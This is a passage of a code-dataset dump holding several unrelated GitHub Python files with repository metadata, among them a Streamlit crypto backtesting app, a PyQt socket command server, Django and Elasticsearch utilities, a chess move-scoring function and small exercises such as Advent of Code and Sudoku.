if val in (POSITIVE_INFINITY, NEGATIVE_INFINITY) or bnd in (POSITIVE_INFINITY, NEGATIVE_INFINITY):\n return False\n if val == bnd:\n return True\n if val < bnd: # Maximization\n val = -val\n bnd = -bnd\n return (val - at < bnd) or (val * (1 - rt) < bnd)\n\n\ndef _get_expr_from_map(expr_map, id):\n \"\"\" Retrieve a model expression from the map of CPO ids for expressions\n Args:\n expr_map: Map of model expressions. 
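The tolerance test combines an absolute and a relative criterion, with a sign flip so the same comparison covers maximization; a standalone restatement for finite numeric inputs (sample numbers invented):

```python
def below_tolerance(val, bnd, rel_tol, abs_tol):
    # Same comparison as _is_below_tolerance, for finite numbers only.
    if val == bnd:
        return True
    if val < bnd:               # bound above value => maximization: negate both
        val, bnd = -val, -bnd
    return (val - abs_tol < bnd) or (val * (1 - rel_tol) < bnd)

print(below_tolerance(100.5, 100.0, rel_tol=0.01, abs_tol=0.0))  # True: within 1%
print(below_tolerance(105.0, 100.0, rel_tol=0.01, abs_tol=0.0))  # False: 5% off
```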
Key is name in JSON document, value is corresponding model expression.\n Returns:\n Model expression\n Raises:\n CpoException if expression is not found (should not happen)\n \"\"\"\n expr = expr_map.get(id)\n if expr is None:\n raise CpoException(\"INTERNAL ERROR: Solve result refers to '{}' that is not found in the map of expressions\".format(id))\n return expr\n\n\n","repo_name":"OscarJHernandez/qc_portfolio_optimization","sub_path":"venv/lib/python3.8/site-packages/docplex/cp/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":79398,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"61"} +{"seq_id":"31840996220","text":"import streamlit as st\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom universal import tools, algos\nfrom universal.algos import *\nimport re\nimport datetime\nimport os\ndef app():\n trading_fee = 0.05 # en pourcent\n st.title('APP5')\n st.write('Welcome to app5')\n\n algorithmes = [algos.Anticor(), algos.BAH(), algos.BCRP(), algos.BestMarkowitz(), algos.BestSoFar(), algos.BNN(),\n algos.CORN(), algos.CRP(), algos.CWMR(), algos.DynamicCRP(), algos.EG(), algos.OLMAR(), algos.ONS(),\n algos.PAMR(), algos.RMR()]\n noms_algos = ['Anticor', 'BAH', 'BCRP', 'BestMarkowitz', 'BestSoFar', 'BNN', 'CORN', 'CRP', 'CWMR', 'DynamicCRP',\n 'EG', 'OLMAR', 'ONS', 'PAMR', 'RMR']\n market_list = [\"Crypto\", \"Nasdaq\", \"Other\"]\n market = st.sidebar.radio(\"Sélectionner un type de marché\", market_list)\n if market == market_list[0]:\n mrkt = \"cryptos\"\n senari_list = [\"covid\", \"ukr_war\", \"année_2018\", \"année_2018_flat\", \"année_2019_flat\", \"année_2021_Nov\",\n \"année_2021_Oct\", \"random1\", \"random2\", \"random3\"]\n elif market == market_list[1]:\n mrkt = \"nasdaq\"\n senari_list = [\"covid\", \"ukr_war\", \"année_2018\", \"année_2018_flat\", \"année_2019_flat\", \"année_2021_Nov\",\n \"année_2021_Oct\", \"random1\", \"random2\", \"random3\", \"subprimes_DF\", \"new_millennium_DF\"]\n else:\n mrkt = 'other'\n senari_list = [\"covid\", \"ukr_war\", \"année_2018\", \"année_2018_flat\", \"année_2019_flat\", \"année_2021_Nov\",\n \"année_2021_Oct\", \"random1\", \"random2\", \"random3\", \"subprimes_DF\", \"new_millennium_DF\"]\n\n senar = st.sidebar.selectbox(\"Senari_list\", senari_list)\n if senar == senari_list[0]:\n snr = \"covid_DF\"\n elif senar == senari_list[1]:\n snr = \"ukr_war_DF\"\n elif senar == senari_list[2]:\n snr = \"année_2018_DF\"\n elif senar == senari_list[3]:\n snr = \"année_2018_flat_DF\"\n elif senar == senari_list[4]:\n snr = \"année_2019_flat_DF\"\n elif senar == senari_list[5]:\n snr = \"année_2021_Nov_DF\"\n elif senar == senari_list[6]:\n snr = \"année_2021_Oct_DF\"\n elif senar == senari_list[7]:\n snr = \"rdm1_DF\"\n elif senar == senari_list[8]:\n snr = \"rdm2_DF\"\n elif senar == senari_list[9]:\n snr = 'rdm3_DF'\n elif senar == senari_list[10]:\n snr = 'subprimes_DF'\n else:\n snr = 'new_millennium_DF'\n\n ### using Markdown\n st.markdown(\"## Let's have a look into our Senari\")\n df_crypto = pd.read_csv(f\"assets/{mrkt}/{snr}.csv\", index_col=0, parse_dates=[0])\n best_algo = pd.read_csv(f\"assets/best_models/{mrkt}/{snr}.csv\", index_col = 0)\n st.write(best_algo)\n close_list = []\n for j in df_crypto.columns:\n if \"Close\" in j:\n close_list.append(j)\n S = df_crypto[close_list]\n S = S.dropna(axis=1)\n st.write(S)\n liste_actions = st.selectbox(\"Choisir le marché\",\n close_list)\n window = 10\n wndw_nbr = S.shape[0] // window\n for j in S.columns:\n 
j_reg = j.replace(\"_Close\", \"\")\n df_crypto[f'{j_reg}_Weight'] = 0\n j = 0\n st.write(df_crypto)\n for i in best_algo['algo']:\n #st.write('j : ', j)\n if i != \"?\":\n algo = algorithmes[noms_algos.index(i)]\n #st.write(algo)\n result = algo.run(S.iloc[j * window: (j + 1) * window, :])\n #st.write(result.weights['BTC-USD_Close'])\n for e in result.weights.columns:\n e_reg = e.replace(\"_Close\", \"\")\n #st.write(e)\n #df_crypto[f'{e}_Weight'].iloc[j * window: (j + 1) * window +1, :] = result.weights[e]\n df_crypto[f\"{e_reg}_Weight\"].iloc[j * window:(j + 1) * window] = result.weights[e]\n # st.write(result.weights[e])\n\n j +=1\n st.write(df_crypto)\n def cash_update(c_start, c_end, csh_start, b_start, b_end, ft):\n gain = np.sum((c_end - c_start)* (b_start-b_end)*csh_start)\n return gain - gain*ft\n #def cash_update(c_start, c_end, csh_start, b_start, b_end, ft):\n l = 0\n\n for line in df_crypto.index:\n\n\n gain_list = []\n for k in S.columns:\n k_reg = k.replace(\"_Close\", \"\")\n gain_i = ((df_crypto[f'{k_reg}_Close'].iloc[l+1] - df_crypto[f'{k_reg}_Close'].iloc[(l)]))/df_crypto[f'{k_reg}_Close'].iloc[(l)]* (df_crypto[f'{k_reg}_Weight'].iloc[l])*df_crypto['Cashback'].iloc[l]\n #st.write(gain)\n gain_reel = gain_i - gain_i*trading_fee\n gain_list.append(gain_reel)\n\n #st.write(sum(gain_list))\n df_crypto['Cashback'].iloc[l+1] = df_crypto['Cashback'].iloc[l] + sum(gain_list)\n l += 1\n if l == S.shape[0]-1:\n break\n st.write(df_crypto['Cashback'])","repo_name":"Drosophobe/pyCrypto","sub_path":"src/StreamLitpyCrypto/tab5.py","file_name":"tab5.py","file_ext":"py","file_size_in_byte":4820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14755442446","text":"# Day 5\n\nwith open(\"./input/input_5.txt\", 'r') as f:\n data = f.read().splitlines()\n\n# Part 1\n\nseat_dict = {}\nfor seat in data:\n row, col = 0, 0\n # lower and upper limit for row number\n ll, ul = 1, 128\n for letter in seat[:-3]:\n if letter == 'F':\n ul -= (ul - ll + 1) / 2\n elif letter == 'B':\n ll += (ul - ll + 1) / 2\n\n # assign row number\n # (-1 because seats are 0-indexed)\n row = int(ll) - 1\n\n ll, ul = 1, 8\n for letter in seat[-3:]:\n if letter == 'L':\n ul -= (ul - ll + 1) / 2\n elif letter == 'R':\n ll += (ul - ll + 1) / 2\n # assign column number\n # (-1 because seats are 0-indexed)\n col = int(ll) - 1\n seat_dict[row * 8 + col] = (row, col)\n\nhighest_seat_id = max(seat_dict.keys())\nprint(\"Part 1\")\nprint(\"Highest seat ID on a boarding pass: {}\\n\".format(highest_seat_id))\n\n# Part 2\nrequired_seat_id = 0\nSEAT_ID_LIST = list(seat_dict.keys())\nSEAT_ID_LIST.sort()\nfor idx in range(0, len(SEAT_ID_LIST) - 1):\n if SEAT_ID_LIST[idx + 1] == SEAT_ID_LIST[idx] + 2:\n required_seat_id = SEAT_ID_LIST[idx] + 1\n break\n\nprint(\"Part 2\")\nif required_seat_id:\n print(\"Required seat ID: {}\".format(required_seat_id))\nelse:\n print(\"Required seat ID not found.\")\nprint(SEAT_ID_LIST)\n","repo_name":"prajwalgatti/advent-of-code-2020","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34970873083","text":"from socket import *\nimport threading\nimport json\nimport sys\nfrom PyQt5.QtCore import Qt, pyqtSignal, QObject\nimport time\n\nfrom src.net.base.server import ServerListenerThread\n\n\nclass CommandListenerServer(ServerListenerThread):\n send_command = pyqtSignal(list, name=\"send_command\")\n\n def 
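The fee-adjusted gain computed inside the portfolio loop above is easier to audit as a standalone function. Two assumptions carried over from the original: trading_fee = 0.05 is applied directly as a fraction (i.e. 5%, despite the "en pourcent" comment), and a 'Cashback' column holding the running capital is expected to exist before the loop runs:

```python
def step_gain(price_prev, price_now, weight, cash, fee=0.05):
    # Relative price move, scaled by the capital fraction held in the asset,
    # minus a proportional fee on the gross gain (fee is a fraction: 0.05 = 5%).
    gross = (price_now - price_prev) / price_prev * weight * cash
    return gross - gross * fee

# Hypothetical step: price 100 -> 103, 50% allocation, 1000 units of cash.
print(step_gain(100.0, 103.0, 0.5, 1000.0))  # 15.0 gross -> 14.25 net
```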
__init__(self, parent, config=None):\n super().__init__(parent, \"command\", config=config)\n self.send_command.connect(\n self.parent_behavior.queue_command, Qt.QueuedConnection\n )\n\n def run_thread(self):\n while True:\n successful = self.start_server()\n # retry server start if not successful\n if not successful:\n continue\n\n # do things while connected\n while self.connected:\n try:\n amount_received = 0\n while amount_received < 4096:\n data = self.conn.recv(4096).decode(\"utf-8\")\n\n if len(data) == 0:\n self.print(\"Empty data; closing socket!\")\n self.close_socket()\n break\n\n if data == \"end connection\":\n self.print(\"closing socket!\")\n self.close_socket()\n break\n\n try:\n data = json.loads(data)\n except:\n self.print(f\"Error decoding message: {data}\")\n break\n amount_received += len(data)\n self.print(f\"Received {data}\")\n\n self.send_command.emit(data)\n\n # send received message to unity\n try:\n message = \"received\"\n self.conn.sendall(message.encode(\"utf-8\"))\n except:\n self.print(f\"Error sending 'received' message!\")\n break\n\n except:\n self.print(\"Socket error!\")\n self.close_socket()\n break\n\n\n# class CommandListenerServer(QObject):\n\n# send_command = pyqtSignal(list, name=\"send_command\")\n\n# def __init__(self, parent, config=None):\n# print(\"COMSERVER: Starting command server!\")\n# super().__init__()\n# self.config = config\n# self.host = \"127.0.0.1\"\n# self.port = config[\"NETWORK\"][\"command_port\"] if config is not None else 13001\n# self.socket = socket(AF_INET, SOCK_STREAM)\n# self.parent_behavior = parent\n# self.send_command.connect(\n# self.parent_behavior.queue_command, Qt.QueuedConnection\n# )\n# self.connected = False\n\n# def run_thread(self):\n# print(\"COMSERVER: Started Thread!\")\n\n# while True:\n# try:\n# self.socket = socket(AF_INET, SOCK_STREAM)\n# self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n# self.socket.bind((self.host, self.port))\n# except:\n# print(f\"COMSERVER: {self.port} already in use!\")\n# if self.socket:\n# if self.connected:\n# self.socket.shutdown(1)\n# self.connected = False\n# self.socket.close()\n# self.socket = None\n# time.sleep(0.3)\n# continue\n\n# try:\n# self.socket.listen() # enable server to accept connections\n# print(\"COMSERVER: Waiting for connection...\")\n# self.conn, address = self.socket.accept() # wait for connection\n# print(f\"COMSERVER: Server connected by {address}\")\n# self.connected = True\n# while True:\n# try:\n# amount_received = 0\n# while True:\n# amount_received = 0\n# while amount_received < 4096:\n# data = self.conn.recv(4096)\n# try:\n# data = json.loads(data.decode(\"utf-8\"))\n# except:\n# print(\"COMSERVER: Error decoding message!\")\n# amount_received += len(data)\n# # print('COMSERVER: Received \"%s\"' % data)\n\n# self.send_command.emit(data)\n\n# except:\n# print(\"COMSERVER: Socket error!\")\n\n# if self.socket and not self.connected:\n# self.socket.shutdown(SHUT_WR)\n# self.socket.close()\n# self.connected = False\n# self.socket = None\n# break\n# except:\n# pass\n# finally:\n# print(\"COMSERVER: Closing socket\")\n# if self.socket and not self.connected:\n# self.socket.shutdown(SHUT_WR)\n# self.socket.close()\n# self.connected = False\n# self.socket = None\n\n\n# if __name__ == \"__main__\":\n\n# try:\n# s = CommandListenerServer()\n# thread = threading.Thread(target=s.run_thread)\n# thread.daemon = True\n# thread.start()\n# # thread.join()\n# while thread.is_alive():\n# thread.join(1) # not sure if there is an appreciable cost to this.\n\n# 
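A minimal client matching the protocol implemented in run_thread() above: send one JSON-encoded list, read the "received" acknowledgement, then ask the server to close. Host and port follow the defaults visible in the commented legacy code (127.0.0.1:13001) and are assumptions:

```python
import json
import socket

with socket.create_connection(("127.0.0.1", 13001)) as s:
    s.sendall(json.dumps(["move", 1.0, 2.0]).encode("utf-8"))  # any JSON list
    print(s.recv(4096).decode("utf-8"))                        # expect "received"
    s.sendall(b"end connection")                               # server closes socket
```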
except (KeyboardInterrupt, SystemExit):\n# print(\"\\n! Received keyboard interrupt, quitting threads.\\n\")\n# s.socket.shutdown(\n# SHUT_RDWR\n# ) # SHUT_RDWR: further sends and receives are disallowed\n# s.socket.close()\n# sys.exit()\n","repo_name":"jotpio/behavior_HF","sub_path":"src/net/command_listener_server.py","file_name":"command_listener_server.py","file_ext":"py","file_size_in_byte":6055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31085512468","text":"import cv2 as cv\nimport sys\nimport requests\nimport time\nimport threading\nfrom threading import Thread\nfrom queue import Queue\nfrom datetime import datetime\nfrom pathlib import Path\nfrom fe.settings import common as config\n\nclass Request_api (threading.Thread):\n \"\"\" \n \n The request_ api class is responsible for create thread for each graped frame.\n\n args:\n frame(obj): a byte of image\n framename(str): a timestanp used to named the frame\n thread_id(int): the id of a given thread\n t_Lock(:obj: int): the semaphore to control the number of threa opened\n save_frame(bool) : defin if the frame should be saved in disk or not. \n \n Attributes:\n frame(obj): a byte of image\n framename(str): a timestanp used to named the frame\n t_Lock(:obj: int): the semaphore to control the number of threa opened\n thread_id(int): the id of a given thread\n save_frame(bool) : defin if the frame should be saved in disk or not.\n \n Return:\n None\n \"\"\"\n\n def __init__(self, frame, framename, threadID, t_Lock, save_frame):\n threading.Thread.__init__(self, daemon=False) \n self.frame = frame\n self.framename = framename\n self.threadID = threadID\n self.t_Lock = t_Lock\n self.save_frame = save_frame\n self.start()\n \n def run (self):\n \n with self.t_Lock: \n\n print('Initialize thread -{thread_id} at {time} ' .format(thread_id =self.threadID, time= time.asctime()))\n \n self.imencoded = cv.imencode(config.IMG_FORMAT, self.frame)[1].tobytes()\n\n self.session = requests.Session()\n \n try:\n \n self.response = self.session.post(url= config.URL_API +'/'+ self.framename, data=self.imencoded)\n \n print(self.response.status_code) \n\n if self.save_frame:\n cv.imwrite(str(config.CORAL_DATA_DIR) +'/'+ self.framename + config.IMG_FORMAT, self.frame)\n with open(str(config.CORAL_DATA_DIR) +'/'+ self.framename + '.xml', 'wb') as f:\n f.write(self.response.content)\n print('Thread - {thread_id} Saved Frame & Anotation at {time} ' .format(thread_id =self.threadID, time= time.asctime()))\n \n except :\n self.response = requests.exceptions.RequestException\n if self.save_frame:\n cv.imwrite(str(config.CORAL_DATA_DIR) +'/'+ self.framename + config.IMG_FORMAT, self.frame)\n print('Thread - {thread_id} Only Saved Frame and Anotation Not Found at {time} ' .format(thread_id =self.threadID, time= time.ctime())) \n \n print('Exiting thread - {thread_id} at {time} ' .format(thread_id =self.threadID, time= time.asctime()))\n \n self.session.close()\n return None \n\n","repo_name":"CEPrE-Unilurio/ai4coral","sub_path":"microservices/fe/thread_request.py","file_name":"thread_request.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31210605538","text":"from django.core.management.base import BaseCommand\nfrom sightings.models import Squirrel\nimport csv\nfrom decimal import Decimal\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument('args', 
nargs='*', type = str)\n def handle(self, *args, **kwargs):\n path = args[0]\n insertlist=[]\n with open(path,\"r\", encoding=\"utf-8\") as f:\n csv_reader = csv.reader(f)\n for row in csv_reader:\n for i in range(0,len(row)):\n if row[i]==\"false\":\n row[i]=False\n if row[i]==\"true\":\n row[i]=True\n date=row[5]\n newdate=date[-4:]+\"-\"+date[0:2]+\"-\"+date[2:4]\n try:\n squirrel = Squirrel(x=Decimal(row[0]), y=Decimal(row[1]),\n unique_squirrel_id=row[2], \n hectare=row[3],\n shift=row[4], \n date=newdate, \n hectare_squirrel_number=row[6], \n age=row[7],\n primary_fur_color=row[8], \n highlight_fur_color=row[9],\n combination_of_primary_and_highlight_color=row[10], \n color_notes=row[11],\n location=row[12],\n above_ground_sighter_measurement=row[13], \n specific_location=row[14],\n running=row[15], \n chasing=row[16], \n climbing=row[17], \n eating=row[18],\n foraging=row[19],\n other_activities=row[20], \n kuks=row[21], \n quaas=row[22],\n moans=row[23],\n tail_flags=row[24], \n tail_twitches=row[25], \n approaches=row[26],\n indifferent=row[27],\n runs_from=row[28], \n other_interactions=row[29], \n lat_long=row[30])\n insertlist.append(squirrel)\n except:\n continue\n Squirrel.objects.bulk_create(insertlist)\n\n\n","repo_name":"tonycao5/squirrel","sub_path":"sightings/management/commands/import_squirrel_data.py","file_name":"import_squirrel_data.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1786419769","text":"import sys\nsys.path.insert(0, '.')\n\nfrom twisted.web.microdom import parseString\nfrom twisted.web.domhelpers import findNodesNamed\nfrom exe.engine.path import Path\nimport json\nimport re\n\nif __name__ == '__main__':\n files = {'lomVocab': Path('exe') / 'webui' / 'schemas' / 'scorm2004' / 'common' / 'vocabValues.xsd',\n 'lomesVocab': Path('exe') / 'webui' / 'schemas' / 'scorm2004' / 'vocab' / 'lomesvocab.xsd'}\n response = ''\n vocab = {}\n for varname, f in files.items():\n document = parseString(f.bytes(), escapeAttributes=0)\n nodes = findNodesNamed(document, 'xs:simpletype')\n for node in nodes:\n name = node.getAttribute('name', str())\n enumerations = findNodesNamed(node, 'xs:enumeration')\n vocab[name] = []\n for enumeration in enumerations:\n vocab[name].append([enumeration.getAttribute('value'), '_(%s)' % enumeration.getAttribute('value')])\n response += '%s = %s;\\n\\n' % (varname, json.dumps(vocab, indent=4).encode('utf-8'))\n outfile = Path('exe') / 'jsui' / 'scripts' / 'lomvocab.js'\n response = re.sub('\"_\\(', '_(\"', response)\n response = re.sub('\\)\"', '\")', response)\n outfile.write_bytes(response)\n","repo_name":"exelearning/iteexe","sub_path":"tools/genlomvocabjs.py","file_name":"genlomvocabjs.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":116,"dataset":"github-code","pt":"61"} +{"seq_id":"40738155140","text":"import json\n\nimport pytest\nfrom elasticsearch import AsyncElasticsearch\n\nfrom settings import settings\nfrom testdata.es_shemas import ES_SHEMAS\n\n\n@pytest.fixture(scope='session')\nasync def es_client():\n client = AsyncElasticsearch(hosts=[settings.elastic_dsn])\n yield client\n await client.close()\n\n\n@pytest.fixture(autouse=True)\nasync def es_init(es_client: AsyncElasticsearch):\n \"\"\"Создаёт индексы для каждого теста и удаляет после завершения.\"\"\"\n for index in ES_SHEMAS:\n await es_client.indices.create(index, body=ES_SHEMAS[index])\n\n yield\n\n for 
index in ES_SHEMAS:\n await es_client.indices.delete(index)\n\n\n@pytest.fixture\ndef es_write_data(es_client: AsyncElasticsearch):\n async def inner(index: str, data: list[dict]):\n bulk_query = []\n for row in data:\n bulk_query.extend([\n json.dumps({'index': {'_index': index, '_id': row['id']}}),\n json.dumps(row)\n ])\n\n str_query = '\\n'.join(bulk_query) + '\\n'\n\n if not await es_client.indices.exists(index):\n raise Exception(\n f'Перед записью данных в индекс {index} его надо '\n f'инициализировать при помощи фикстуры es_{index}_index'\n )\n response = await es_client.bulk(str_query, refresh=True)\n if response['errors']:\n raise Exception('Ошибка записи данных в Elasticsearch')\n\n return inner\n","repo_name":"latiennetendresse/Async_API_sprint_2","sub_path":"fastapi-solution/tests/functional/fixtures/elastic.py","file_name":"elastic.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11260831110","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.home, name=\"home\"),\n path('customers/', views.customers, name='customers'),\n path('customer//', views.customer, name=\"customer\"),\n path('create_customer/', views.createCustomer, name=\"create_customer\"),\n path('update_customer//', views.updateCustomer, name=\"update_customer\"),\n path('delete_customer//', views.deleteCustomer, name=\"delete_customer\"), \n path('register/', views.registerPage, name='register'),\n path('login/', views.loginPage, name='login'),\n\n path('sendwa/', views.sendwa, name=\"send_wa\"),\n\n path('pdf_view/', views.ViewPDF.as_view(), name=\"pdf_view\"),\n path('pdf_download/', views.DownloadPDF.as_view(), name=\"pdf_download\"),\n\n path('create_device/', views.create_device, name=\"create_device\"),\n path('devices/', views.devices, name='devices'),\n]","repo_name":"YusufCandraArif/crmwaahass","sub_path":"crm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4734100252","text":"from dataclasses import dataclass\nfrom typing import List, Set, Callable, Tuple\nimport warnings\nimport chess\nimport chess.engine\nfrom reconchess import is_psuedo_legal_castle\nfrom reconchess.utilities import capture_square_of_move\n\nfrom Fianchetto.utilities import simulate_move\nimport numpy as np\n\nfrom lczero.backends import Weights, Backend, GameState\nfrom scipy.special import softmax as softmax\nfrom termcolor import colored\nwarnings.simplefilter(\"error\", RuntimeWarning)\n# get better sneak rewards\n@dataclass\nclass ScoreConfig:\n capture_king_score: float = 200 # bonus points for a winning move\n checkmate_score: int = 120 # point value of checkmate\n stalemate_score: int = 80 # point value of stalemate\n into_check_score: float = -160 # point penalty for moving into check\n search_depth: int = 8 # Stockfish engine search ply\n reward_attacker: float = 1.5 # Bonus points if move sets up attack on enemy king\n require_sneak: bool = True # Only reward bonus points to aggressive moves if they are sneaky (aren't captures)\n far_away_defense_score: float = 0.5 #Bonus points for protecting against check from far away with support (fads)\n\n\ndef map_uci(uci: str, board: chess.Board = None):\n \"\"\"Returns standard UCI moves (including castling) when board is also given\"\"\"\n if board and 
board.piece_at(chess.parse_square(uci[:2])).piece_type is chess.KING:\n if uci == \"e8h8\":\n return map_uci(\"e8g8\")\n elif uci == \"e8a8\":\n return map_uci(\"e8c8\")\n elif uci == \"e1h1\":\n return map_uci(\"e1g1\")\n elif uci == \"e1a1\":\n return map_uci(\"e1c1\")\n else:\n return map_uci(uci)\n else:\n return chess.Move.from_uci(uci)\n\ndef calculate_score(b,\n board_fen,\n moves: List[chess.Move],\n score_config: ScoreConfig = ScoreConfig()):\n\n # pov = board.turn\n\n # if next_board.was_into_check():\n # return score_config.into_check_score\n board = chess.Board(board_fen)\n pov = board.turn\n game = GameState(fen=board_fen)\n inp = game.as_input(b)\n out = b.evaluate(inp)[0]\n q = out.q()\n raw_scores_c = {map_uci(uci, board): score for uci, score in zip(game.moves(), out.p_raw(*game.policy_indices()))}\n\n if len(raw_scores_c) > 0:\n least_score = min(raw_scores_c.values())\n else:\n raw_scores_rbc = [0]*len(moves)\n raw_scores_rbc[moves.index(chess.Move.null())] = 10\n print(colored(f'No moves in this board (q = {q}):', 'red'))\n print(board_fen)\n return q, raw_scores_rbc, moves\n\n raw_scores_rbc = [-2*abs(least_score)]*len(moves)\n revised = {}\n\n\n for i, move in enumerate(moves):\n # print(move)\n if move != chess.Move.null() and not is_psuedo_legal_castle(board, move):\n # print('first if')\n if not board.is_pseudo_legal(move):\n # check for sliding move alternate results, and score accordingly\n revised_move = simulate_move(board, move)\n if revised_move is not None:\n revised[i] = moves.index(revised_move)\n else:\n if board.is_check():\n raw_scores_rbc[i] = score_config.into_check_score\n else:\n raw_scores_rbc[i] = -2*abs(least_score)\n continue\n elif board.is_capture(move):\n if board.piece_at(capture_square_of_move(board, move)).piece_type is chess.KING:\n raw_scores_rbc[i] = score_config.capture_king_score\n q = 1\n break\n elif move == chess.Move.null():\n if board.is_check():\n raw_scores_rbc[i] = score_config.into_check_score\n else:\n raw_scores_rbc[i] = -2*abs(least_score)\n continue\n\n next_board = board.copy()\n next_board.push(move)\n next_board.clear_stack()\n if next_board.was_into_check():\n raw_scores_rbc[i] = score_config.into_check_score\n elif next_board.is_checkmate():\n raw_scores_rbc[i] = score_config.checkmate_score\n else:\n if board.was_into_check(): \n king_attackers = board.attackers(not pov, board.king(pov)) # list of squares/pieces that attack our king\n for square in king_attackers: \n if ((board.piece_type_at(square)==3) or (board.piece_type_at(square)==4) or (board.piece_type_at(square)==5)): # 3->Bishop, 4->Rook, 5->Queen\n support=next_board.attackers(pov,move.to_square)\n opposition=next_board.attackers(not pov,move.to_square)\n if len(list(support))>=len(list(opposition)):\n if chess.square_distance(move.to_square,board.king(pov))>2:\n raw_scores_rbc[i]=score_config.far_away_defense_score\n break\n\n # print('getting from neural')\n if move in raw_scores_c:\n raw_scores_rbc[i] += raw_scores_c[move]\n\n if next_board.is_stalemate():\n raw_scores_rbc[i]+=score_config.stalemate_score\n\n # Add bonus board position score if king is attacked\n king_attackers = next_board.attackers(pov, next_board.king(not pov)) # list of pieces that can reach the enemy king\n if king_attackers: # if there are any such pieces...\n if not score_config.require_sneak: # and we don't require the attackers to be sneaky\n raw_scores_rbc[i] += score_config.reward_attacker # add the bonus points\n # or if we do require the attackers to be sneaky, either the 
last move was not a capture (which would give away\n # our position) or there are now attackers other than the piece that moves (discovered check)\n elif not next_board.is_capture(move) or any([square != move.to_square for square in king_attackers]):\n raw_scores_rbc[i] += score_config.reward_attacker # add the bonus points\n\n if len(king_attackers)==1:\n square = king_attackers.pop()\n support=next_board.attackers(pov,square)\n opposition=next_board.attackers(not pov,square)\n if len(list(support)) 0.5:\n y_prediction[x] = 1\n else:\n y_prediction[x] = 0\n\n # return predictions:\n return y_prediction.tolist()\n\n\n#No solvers for quadratic discrimination\ndef apply_quad_disc(train_x, train_y, test_x):\n # apply Linear Regression:\n qda = QuadraticDiscriminantAnalysis()\n qda.fit(train_x, train_y)\n\n # predict the results:\n y_prediction = qda.predict(test_x)\n\n # cast the results to 0 ant 1:\n for x, data in enumerate(y_prediction):\n if data > 0.5:\n y_prediction[x] = 1\n else:\n y_prediction[x] = 0\n\n # return predictions:\n return y_prediction.tolist()\n","repo_name":"suong4554/Machine-Learning-Poly-U","sub_path":"ML_Group_Project/scripts/discrimAnalAlgo.py","file_name":"discrimAnalAlgo.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15343083771","text":"def choice(val):\r\n if val==1:\r\n count_no_of_vowels(string)\r\n elif val==2:\r\n sum_of_digits(string)\r\n elif val==3:\r\n special_char_count(string)\r\n print(\"-\"*72)\r\n \r\ndef count_no_of_vowels(string):\r\n count=0\r\n for alphabet in string:\r\n if alphabet.lower() in [\"a\",\"e\",\"i\",\"o\",\"u\"]:\r\n count+=1\r\n print(\" Total no of vowels :\",count)\r\n \r\ndef sum_of_digits(string):\r\n total=0\r\n for char in string:\r\n if char.isnumeric():\r\n total+=int(char)\r\n else:\r\n continue\r\n print(\" Sum of digits :\",total)\r\n\r\ndef special_char_count(string):\r\n total=0\r\n for char in string:\r\n if char.isalnum():\r\n continue\r\n else:\r\n total+=1\r\n print(\" Total no of characters :\",total)\r\n\r\nprint(\"|-------------------------EXPERIMENT NO.23-----------------------------|\")\r\nprint(\"| REMOVING A SPECIFIED CHARACTER FROM THE STRING |\")\r\nprint(\"|----------------------------------------------------------------------|\")\r\nstring=input(\" Enter a string : \")\r\nprint(\"*\"*72)\r\nval=int(input(\" Enter your choice: \"))\r\nwhile val!=4:\r\n choice(val)\r\n print(\"1. Count number of vowels\")\r\n print(\"2. Find sum of digits\")\r\n print(\"3. Count special characters\")\r\n print(\"4. 
Exit\")\r\n val=int(input(\" Enter your choice: \"))\r\n","repo_name":"wizexplorer/string-methods-python","sub_path":"string_methods.py","file_name":"string_methods.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21834446386","text":"import random\nfrom termcolor import colored\nfrom validador import tiene_repeticiones, validar_rango_numero, sudoku_esta_lleno\nimport os\n\npistas_restantes = 3\n\ndef creador_tablero(ruta_archivo):\n archivo = open(ruta_archivo, 'r')\n set = archivo.readlines()\n nro_tablero_elegido = random.randint(0, len(set)-1)\n tablero_elegido = set[nro_tablero_elegido]\n caracteres = tablero_elegido.strip().split(',')\n tablero_final = []\n i = 0\n fila = []\n for caracter in caracteres:\n if caracter == '?':\n celda = {'numero': caracter, 'editable': True}\n else:\n celda = {'numero': caracter, 'editable': False}\n fila.append(celda)\n i += 1\n if i == 9:\n tablero_final.append(fila)\n fila = []\n i = 0\n return tablero_final\n\ndef elegir_dificultad():\n print(\"¡Bienvenido a Sudoku!\")\n print(\"Para iniciar el juego, por favor elija la dificultad\")\n print(\"1) Facil\")\n print(\"2) Normal\")\n print(\"3) Dificil\\n\")\n opcion = input(\"Ingrese la dificultad elegida: \")\n \n while(not validar_rango_numero(opcion, 1, 3)):\n opcion = input(\", por favor, intenta de nuevo: \")\n\n if opcion == '1':\n print(\"\\nHas seleccionado la dificultad Facil. A continuación se muestra el sudoku a resolver:\\n\")\n return \"setsudokus/set_facil.txt\"\n elif opcion == '2':\n print(\"\\nHas seleccionado la dificultad 